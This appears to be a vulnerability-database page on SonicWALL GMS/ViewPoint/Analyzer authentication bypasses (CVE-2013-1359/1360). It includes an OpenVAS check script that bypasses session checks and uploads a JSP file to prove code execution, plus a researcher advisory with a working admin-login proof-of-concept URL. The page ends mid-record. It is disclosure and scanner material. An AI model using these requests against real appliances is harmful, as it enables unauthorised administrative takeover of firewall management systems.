Description
It's possible to access a few directories without authentication.
Affected Software
Related
{"id": "SECURITYVULNS:VULN:12839", "bulletinFamily": "software", "title": "SonicWALL GMS/Viewpoint/Analyzer authentication bypass", "description": "It's possible to access few directories without authentication", "published": "2013-01-21T00:00:00", "modified": "2013-01-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12839", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:28968", "https://vulners.com/securityvulns/securityvulns:doc:28969"], "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "type": "securityvulns", "lastseen": "2021-06-08T19:13:06", "edition": 2, "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-1808", "CPAI-2014-1290"]}, {"type": "cve", "idList": ["CVE-2013-1359", "CVE-2013-1360"]}, {"type": "exploitdb", "idList": ["EDB-ID:24203"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DA2C6058EEC4E08CE4AAA2F7408B7EB3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103642"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119639", "PACKETSTORM:119808"]}, {"type": "saint", "idList": ["SAINT:1D818306CDCE9D06452355B580B07037", "SAINT:7A9FC357D019902C8221DA08FCAAE376", "SAINT:C7FDFE5DCFFF03B22ABA033E11C9F99B", "SAINT:F3B855C79359E1F0667451D37C614E49"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28968", "SECURITYVULNS:DOC:28969"]}]}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-1808", "CPAI-2014-1290"]}, {"type": "cve", "idList": ["CVE-2013-1359"]}, {"type": "exploitdb", "idList": ["EDB-ID:24203"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/SONICWALL_GMS_UPLOAD"]}, {"type": "saint", "idList": ["SAINT:7A9FC357D019902C8221DA08FCAAE376"]}]}, "exploitation": null, "vulnersScore": 4.2}, "affectedSoftware": [{"name": "sonicwall global management system", 
"operator": "eq", "version": "7.0"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1660013489}, "_internal": {"score_hash": "1edd9bc1a311727564e4d7a2ed0db61d"}}
{"openvas": [{"lastseen": "2020-05-08T11:04:16", "description": "Multiple SonicWALL products including Global Management System (GMS),\n ViewPoint, Universal Management Appliance (UMA), and Analyzer are\n prone to an authentication-bypass vulnerability.", "cvss3": {}, "published": "2013-01-18T00:00:00", "type": "openvas", "title": "Multiple SonicWALL Products Authentication Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Multiple SonicWALL Products Authentication Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103642\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(57445);\n script_cve_id(\"CVE-2013-1359\", \"CVE-2013-1360\");\n script_version(\"2020-05-05T09:44:01+0000\");\n\n script_name(\"Multiple SonicWALL Products Authentication Bypass Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57445\");\n script_xref(name:\"URL\", value:\"http://www.sonicwall.com/\");\n script_xref(name:\"URL\", value:\"http://sotiriu.de/adv/NSOADV-2013-001.txt\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-18 13:01:11 +0100 (Fri, 18 Jan 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. 
Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"Multiple SonicWALL products including Global Management System (GMS),\n ViewPoint, Universal Management Appliance (UMA), and Analyzer are\n prone to an authentication-bypass vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to gain administrative access to the\n web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully\n compromise the system.\");\n\n script_tag(name:\"affected\", value:\"GMS/Analyzer/UMA 7.0.x\n\n GMS/ViewPoint/UMA 6.0.x\n\n GMS/ViewPoint/UMA 5.1.x\n\n GMS/ViewPoint 5.0.x\n\n GMS/ViewPoint 4.1.x\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:80);\n\nurl = \"/\";\nbuf = http_get_cache(item:url, port:port);\n\nif(! buf || \"<title>sonicwall\" >!< tolower(buf))\n exit(0);\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: 90\\r\\n\",\n\"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n\"\\r\\n\",\n\"num=123456&action=show_diagnostics&task=search&item=application_log&criteria=*.*&width=500\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(\"<OPTION VALUE\" >!< result)\n exit(0);\n\nlines = split(result);\n\nforeach line (lines) {\n if(\"<OPTION VALUE\" >< line) {\n a = split(line,sep:'\"', keep:FALSE);\n if(\"logs\" >< a[1]) {\n b = split(a[1],sep:\"logs\",keep:FALSE);\n gms_path = b[0];\n if(!isnull(gms_path))break;\n }\n }\n}\n\nif(isnull(gms_path))\n exit(0);\n\nif(gms_path =~ \"^/\") 
{\n gms_path = gms_path + \"webapps/appliance/\";\n} else {\n gms_path = gms_path + 'webapps\\\\appliance\\\\';\n}\n\nvtstrings = get_vt_strings();\nfile = vtstrings[\"lowercase_rand\"] + '.jsp';\njsp_print = vtstrings[\"lowercase_rand\"];\njsp = '<% out.println( \"' + jsp_print + '\" ); %>';\n\nlen = 325 + strlen(jsp) + strlen(gms_path) + strlen(file);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: \",len,\"\\r\\n\",\n\"Content-Type: multipart/form-data; boundary=xYzZY\\r\\n\",\n\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"action\"',\"\\r\\n\",\n\"\\r\\n\",\n\"file_system\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"task\"',\"\\r\\n\",\n\"\\r\\n\",\n\"uploadFile\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"searchFolder\"',\"\\r\\n\",\n\"\\r\\n\",\ngms_path,\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"uploadFileName\"; filename=\"',file,'\"',\"\\r\\n\",\n\"Content-Type: text/plain\\r\\n\",\n\"\\r\\n\",\njsp,\"\\r\\n\",\n\n\"\\r\\n\",\n\"--xYzZY--\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(!result || result !~ \"^HTTP/1\\.[01] 200\")\n exit(0);\n\nurl = '/appliance/' + file;\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(jsp_print >< buf) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSonicWALL GMSViewpointAnalyzer - Authentication Bypass", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-01-18T00:00:00", "title": "SonicWALL GMSViewpointAnalyzer - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "EXPLOITPACK:DA2C6058EEC4E08CE4AAA2F7408B7EB3", "href": "", "sourceData": "-------------------------- NSOADV-2013-002 ---------------------------\n\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\n______________________________________________________________________\n______________________________________________________________________\n\n 111101111\n 11111 00110 00110001111\n 111111 01 01 1 11111011111111\n 11111 0 11 01 0 11 1 1 111011001\n 11111111101 1 11 0110111 1 1111101111\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\n 01110 0 10 111110 110 0 11101111111111111111101111101\n 111111 11 0 1111 0 1 1 1 1 
111111111111111111111101 111\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\n 111 10 110 101011110010 11111111111111111111111 11 0011100\n 11 10 001100 0001 111111111111111111 10 11 11110\n 11110 00100 00001 10 1 1111 101010001 11111111\n 11101 0 1011 10000 00100 11100 00001101 0\n 0110 111011011 0110 10001 101 11110\n 1011 1 10 101 000001 01 00\n 1010 1 11001 1 1 101 10\n 110101011 0 101 11110\n 110000011\n 111\n______________________________________________________________________\n______________________________________________________________________\n\n Title: SonicWALL GMS/Viewpoint/Analyzer\n Authentication Bypass (/sgms/)\n Severity: Critical\n CVE-ID: CVE-2013-1360\n CVSS Base Score: 9\n Impact: 8.5\n Exploitability: 10\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\n Advisory ID: NSOADV-2013-002\n Found Date: 2012-04-26\n Date Reported: 2012-12-13\n Release Date: 2013-01-17\n Author: Nikolas Sotiriu\n Website: http://sotiriu.de\n Twitter: http://twitter.com/nsoresearch\n Mail: nso-research at sotiriu.de\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\n Affected Products: GMS\n Analyzer\n UMA\n ViewPoint\n Affected Platforms: Windows/Linux\n Affected Versions: GMS/Analyzer/UMA 7.0.x\n GMS/ViewPoint/UMA 6.0.x\n GMS/ViewPoint/UMA 5.1.x\n GMS/ViewPoint 5.0.x\n GMS/ViewPoint 4.1.x\n Remote Exploitable: Yes\n Local Exploitable: No\n Patch Status: Vendor released a patch (See Solution)\n Discovered by: Nikolas Sotiriu\n\n\n\nBackground:\n===========\n\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\ndistributed enterprises and service providers with a powerful and\nintuitive solution to centrally manage and rapidly deploy SonicWALL\nfirewall, anti-spam, backup and recovery, and secure remote access\nsolutions. 
Flexibly deployed as software, hardware, or a virtual\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\ncomprehensive policy and compliance reporting. For enterprise customers,\nSonicWALL GMS streamlines security policy management and appliance\ndeployment, minimizing administration overhead. Service Providers can\nuse GMS to simplify the security management of multiple clients and\ncreate additional revenue opportunities. For added redundancy and\nscalability, GMS can be deployed in a cluster configuration.\n\n(Product description from Website)\n\n\n\nDescription:\n============\n\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\nallows an unauthenticated, remote attacker to bypass the Web interface\nauthentication offered by the affected product.\n\nThe vulnerability is attributed to a broken session handling in the\nprocess of password change process of the web application.\nchanging in the web application.\n\nAn attacker may exploit this vulnerability by sending a specially\ncrafted request to the SGMS Interface (/sgms/).\n\nThe attacker gains full administrative access to the interface and\nfull control over all managed appliances, which could lead to a full\ncompromisation of the organisation.\n\n\n\nProof of Concept :\n==================\n\nAccess the following URL to login to the sgms interface:\n\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\n00000000001\n\nIf the Console is not directly shown, type any password you\nwant in the change password dialog twice and hit submit to login.\n\nMaybe you need to access the following URL after this process:\n\nhttp://host/sgms/auth\n\n\n\nSolution:\n=========\n\nInstall Hotfix 125076.77. 
(Download from www.mysonicwall.com)\n\n\n\nDisclosure Timeline:\n====================\n\n2012-04-26: Vulnerability found\n2012-12-12: Sent the notification and disclosure policy and asked\n for a PGP Key (security@sonicwall.com)\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\n date (2012-12-28) to vendor\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\n release to the 3. calendar week 2013.\n2012-12-18: Changed release date to 2013-01-17.\n2012-12-20: Patch is published\n2013-01-17: Release of this advisory", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:13:07", "description": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T16:15:00", "type": "cve", "title": "CVE-2013-1360", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1360"], "modified": "2020-02-13T14:12:00", "cpe": ["cpe:/a:sonicwall:universal_management_appliance:5.1", "cpe:/a:sonicwall:universal_management_appliance:6.0", "cpe:/a:sonicwall:global_management_system:4.1", "cpe:/a:sonicwall:universal_management_appliance:7.0", "cpe:/a:sonicwall:viewpoint:6.0", "cpe:/a:sonicwall:global_management_system:6.0", "cpe:/a:sonicwall:global_management_system:7.0", "cpe:/a:sonicwall:viewpoint:4.1", "cpe:/a:sonicwall:viewpoint:5.0", "cpe:/a:sonicwall:global_management_system:5.0", "cpe:/a:sonicwall:analyzer:7.0", "cpe:/a:sonicwall:global_management_system:5.1"], "id": "CVE-2013-1360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1360", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:06", "description": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote 
malicious user obtain access to the root account.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T17:15:00", "type": "cve", "title": "CVE-2013-1359", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2020-02-14T18:13:00", "cpe": ["cpe:/a:sonicwall:universal_management_appliance:5.1", "cpe:/a:sonicwall:universal_management_appliance:6.0", "cpe:/a:sonicwall:global_management_system:4.1", "cpe:/a:sonicwall:universal_management_appliance:7.0", "cpe:/a:sonicwall:viewpoint:6.0", "cpe:/a:sonicwall:global_management_system:6.0", "cpe:/a:sonicwall:global_management_system:7.0", "cpe:/a:sonicwall:viewpoint:4.1", "cpe:/a:sonicwall:viewpoint:5.0", "cpe:/a:sonicwall:global_management_system:5.0", "cpe:/a:sonicwall:analyzer:7.0", "cpe:/a:sonicwall:global_management_system:5.1"], "id": "CVE-2013-1359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2013-1360"], "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 
001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. 
For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a broken session handling in the\r\nprocess of password change process of the web application.\r\nchanging in the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromisation of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to login to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to login.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. 
(Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28969", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28969", "title": "NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-001 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 
